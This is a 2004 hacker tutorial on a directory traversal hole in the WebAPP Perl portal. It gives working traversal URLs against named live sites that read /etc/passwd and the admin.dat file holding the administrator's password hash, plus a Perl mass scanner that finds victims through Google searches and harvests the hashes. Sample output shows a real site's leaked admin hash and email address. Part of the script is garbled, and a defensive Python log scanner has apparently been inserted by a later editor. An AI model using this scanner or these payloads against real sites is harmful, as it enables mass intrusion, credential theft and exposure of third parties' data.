/*********************************************************
 * Newest WebAPP bug mass scanner
 * (fresh release)
 *
 * by : iko (iko94@yahoo.com)
 * www.geocities.com/iko94
 *
 * release : sept,1,2004
 *
 * No Warranty. This tutorial is for educational use only,
 * commercial use is prohibited.
 **********************************************************/

Once again, yet another bug in a web application, huh...

WebAPP is introduced as the internet's most feature rich, easy to run PERL based portal system. Its home sites are http://www.web-app.org/ and http://cornerstone.web-app.org/cgi-bin/index.cgi

The WebAPP system itself has a serious reverse directory traversal vulnerability. Example:

http://www.kingscalendar.com/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00

then view the HTML source of that page; you will find the contents of the password file, broken up into pieces.

http://www.kingscalendar.com/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00

then view the HTML source of that page and you will see the line:

href="index.cgi?action=viewnews&id=adE1/IumoQXiM">

"adE1/IumoQXiM" is the Administrator's hashed password, which uses standard DES crypt, so you only need to run a password cracking program to crack it. Every user has a .dat file in the db/members directory. So the question now is, is there a DES cracker?

OK, now it's time to look at the Perl script listing.
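Before the listing, an added defender-side example (not part of the original tutorial): a small scanner over web-server access logs that flags the traversal pattern described above, a `..` path segment or a `%00` null byte in a query parameter, including the percent-encoded and double-encoded forms. The log lines are constructed for the example; the two payloads are the ones the tutorial itself uses against index.cgi.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache access-log lines (not from the original page); the two
# traversal payloads are the ones the tutorial uses against index.cgi.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Sep/2004:10:00:01 +0000] "GET /cgi-bin/index.cgi?action=topics&viewcat=news HTTP/1.1" 200 512
10.0.0.7 - - [01/Sep/2004:10:00:02 +0000] "GET /cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00 HTTP/1.1" 200 4096
10.0.0.7 - - [01/Sep/2004:10:00:03 +0000] "GET /cgi-bin/index.cgi?action=topics&viewcat=..%2F..%2Fdb%2Fmembers%2Fadmin.dat%2500 HTTP/1.1" 200 300
10.0.0.9 - - [01/Sep/2004:10:00:04 +0000] "GET /cgi-bin/index.cgi?action=viewnews&id=42 HTTP/1.1" 200 900
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')


def full_decode(value, rounds=3):
    """Percent-decode until stable so %2e%2e and double-encoded %2500 (NUL) are seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(url):
    """Return (name, decoded value) for query parameters carrying a traversal payload."""
    hits = []
    query = urlsplit(url).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            v = full_decode(raw).replace("\\", "/")
            # A '..' path segment or an embedded NUL (the %00 truncation trick) is the signal.
            if ".." in v.split("/") or "\x00" in v:
                hits.append((name, v))
    return hits


def scan_log(text):
    """Scan access-log text and return one finding per suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, when, url, status = m.groups()
        for name, v in suspicious_params(url):
            findings.append({"ip": ip, "time": when, "status": int(status),
                             "param": name, "value": v})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

A finding with status 200 is the one to treat as a probable successful read, which is exactly what the tutorial's own output shows; a 4xx on the same pattern is a blocked probe.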
==================cut here========================
#!/usr/bin/perl
#
use LWP::UserAgent;
use HTTP::Message;
use URI::Escape;

$baner=<   # the text from here up to the next line was lost in extraction
           # (presumably the banner, argument handling and the settings used below)
$ua = LWP::UserAgent->new;
$ua->timeout(35);
$ua->agent("MSIE/6.0 Windows");
$ua->proxy(http => $proxy) if defined($proxy);
$browser = LWP::UserAgent->new;
$browser -> agent($Agent);
$browser->proxy(http => $proxy) if defined($proxy);
$counter=0;
#Read last session
open(hf,$fsav);
$lastsav=<hf>;
close(hf);
$check=1;#Check if any save session
$nomer=1;
while(1) {
  $gourl = "http://www.google.com/search?q=allinurl:$komponen&num=10&hl=en&lr=&ie=UTF-8&oe=utf-8&start=$counter&sa=N";
  $grabresponse = $ua->get($gourl);
  $counter=$counter+10;
  if (!($grabresponse->is_success)) {
    printlog ($grabresponse->status_line. " Failure\n");
  } else {
    $data1 = $grabresponse->as_string;
    open(lol,">$tempfile");
    print lol $data1;
    close(lol);
    open(lol,$tempfile) || die("Cannot open the file");
    @fh=<lol>;
    close(lol);
    #$data=join("",@loli);
    exit if ($data=~/Google does not serve more than 1000/); #End Google search or Stop
    foreach (@fh) {
      $hasil=$_=~/\ \/g;   # the link pattern between the two backslashes was lost in extraction
      $url=$1;
      if ($hasil) {
        #print "found = $pass ::: \n";}
        if (($lastsav ne "") && (!($lastsav =~ /$url/)) && $check) { next; } else { $check=0; }
        #Save Session
        open(hf,">$fsav");
        print hf $url;
        close(hf);
        printlog("$nomer. http://$url$exp1\t");
        $nomer++;
        #GET password ; exp1
        $urltarget= "http://$url".$exp1;
        $urltarget=~s/ /%20/g;
        print "\nProcessing oi $urltarget.....\n";
        $loginpost = $urltarget;
        $loginrequest = HTTP::Request->new(GET => $loginpost);
        $loginrequest->referer($urltarget);
        print "Proses GET sedang berlangsung...\n";
        $loginresponse = $browser->request($loginrequest);
        $logincek = $loginresponse->as_string;
        if (!($loginresponse->is_success)) {
          print ("$loginpost Failure\n");
          printlog ("Gagal total ".$loginresponse->status_line. " Failure\n");
        } else {
          print ("$loginpost Success\n");
          printlog ($loginresponse->status_line. " could be Success\n");
          #print "$logincek\n";
          $data1 = $loginresponse->as_string;
          open(lol,">$tempfile");
          print lol $data1;
          close(lol);
          print "sukses donlod exp1 ...\n";
          #exit;
          open(lol,$tempfile) || die("Cannot open the file");
          @loli=<lol>;
          close(lol);
          foreach (@loli) {
            $hasil=$_=~/\;id\=(.+?)\"\>/g;
            $pass=$1;
            if ($hasil) {printlog ("found = $pass :::\n");$tanda=1;}
          } #of foreach
          if (!($tanda==1)) {printlog ("parsing file gak ada hasil... \n");}
          $tanda=0;
        } # end of else (success)
        printlog("\n");
        #GET admin.dat ; exp2
        $urltarget= "http://$url".$exp2;
        $urltarget=~s/ /%20/g;
        print "\nProcessing oi $urltarget.....\n";
        $loginpost = $urltarget;
        $loginrequest = HTTP::Request->new(GET => $loginpost);
        $loginrequest->referer($urltarget);
        print "Proses GET sedang berlangsung...\n";
        $loginresponse = $browser->request($loginrequest);
        $logincek = $loginresponse->as_string;
        if (!($loginresponse->is_success)) {
          print ("$loginpost Failure\n");
          printlog ("Gagal total ".$loginresponse->status_line. " Failure\n");
        } else {
          print ("$loginpost Success\n");
          printlog ($loginresponse->status_line. " could be Success\n");
          #print "$logincek\n";
          $data1 = $loginresponse->as_string;
          open(lol,">$tempfile");
          print lol $data1;
          close(lol);
          print "sukses donlod exp2 ...\n";
          #exit;
          open(lols,$tempfile) || die("Cannot open the file");
          @lolipop=<lols>;
          close(lols);
          foreach (@lolipop) {
            $hasil=$_=~/\;id\=(.+?)\"\>/g;
            $pass=$1;
            if ($hasil) {printlog ("found = $pass :::\n");$tanda=1;}
          } #of foreach
          if (!($tanda==1)) {printlog ("parsing file gak ada hasil... \n");}
          $tanda=0;
        } # end of else (success)
        printlog("\n");
      } #end of if ($hasil)
    } #end of foreach
  } #end of if
} #end of while

sub printlog {
  print @_[0];
  open(lo,">>$log");
  print lo @_[0];
  close(lo);
  return;
}
==================cut here========================

Save it as webapp_google_donlod.pl. Now try running it:

perl webapp_google_donlod.pl "index.cgi?action=topics"

OK, now look at part of the script's output:

==================cut here========================
64. http://www.thanhtan.com/cgi-bin/vn/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00
Processing oi http://www.thanhtan.com/cgi-bin/vn/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00.....
Proses GET sedang berlangsung...
http://www.thanhtan.com/cgi-bin/vn/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00 Success
200 OK could be Success
sukses donlod exp1 ...
found = 47" shape="rect" coords="267, 62, 350, 79 :::
found = 52" shape="rect" coords="349, 62, 433, 79 :::
found = 68" shape="rect" coords="432, 62, 516, 79 :::
found = 47" class="menu :::
found = 52" class="menu :::
found = 68" class="menu :::
[... about 30 lines, the target's /etc/passwd entries printed as "found = <entry> :::", omitted here ...]
found = 47 :::
found = 52 :::
found = 68 :::
Processing oi http://www.thanhtan.com/cgi-bin/vn/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00.....
Proses GET sedang berlangsung...
http://www.thanhtan.com/cgi-bin/vn/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00 Success
200 OK could be Success
sukses donlod exp2 ...
found = 47" shape="rect" coords="267, 62, 350, 79 :::
found = 52" shape="rect" coords="349, 62, 433, 79 :::
found = 68" shape="rect" coords="432, 62, 516, 79 :::
found = 47" class="menu :::
found = 52" class="menu :::
found = 68" class="menu :::
found = adniqN/bZkSVw :::
found = Admin :::
found = contact@thanhtan.com :::
found = http://www.thanhtan.com/ :::
found = My generic signature&& :::
found = 5 :::
found = Administrator :::
found = _nopic.gif :::
found = forever :::
found = 38 :::
found = 0 :::
found = standard :::
found = 47 :::
found = 52 :::
found = 68 :::
==================cut here========================

:)) Not exactly perfect, admittedly... but it is enough to check for the weakness in websites that use WebAPP.

Look at the output line:

found = adniqN/bZkSVw :::

yes, that is the Administrator's hashed password. You can see the results in the script's log file.

That's all for now... Hopefully this writing is useful to its readers and broadens our thinking about the world of internet security. :)

*very very very special greetz to:
[+][+][+] my beloved ana [+][+][+]

*shout to dhanny firman syah : keep fighting, bro...
*special greetz to:
[+] www.neoteker.or.id
[+] www.echo.or.id
[+] www.bosen.net
[+] bosen
[+] ftp_geo
[+] tiong
[+] all #1stlink #neoteker #e-c-h-o #batamhacker #kartubeben #antihackerlink crew @ dal net
[+] all #1stlink #romance #hackers @ centrin
[+] sj, alphacentupret, boeboe, fuzk3 kendi
[+] y3d1ps, z3r0byt3, biatch-x

*iko thanks:
[+] qq
[+] tiyox
[+] keputih group
[+] everyone who shouting the freedom

*iko does not thank:
[-] monopoly
[-] bureaucracy
[-] the sycophants
[-] the corrupt
[-] closed source

send criticism && suggestions to iko94@yahoo.com

[EOF]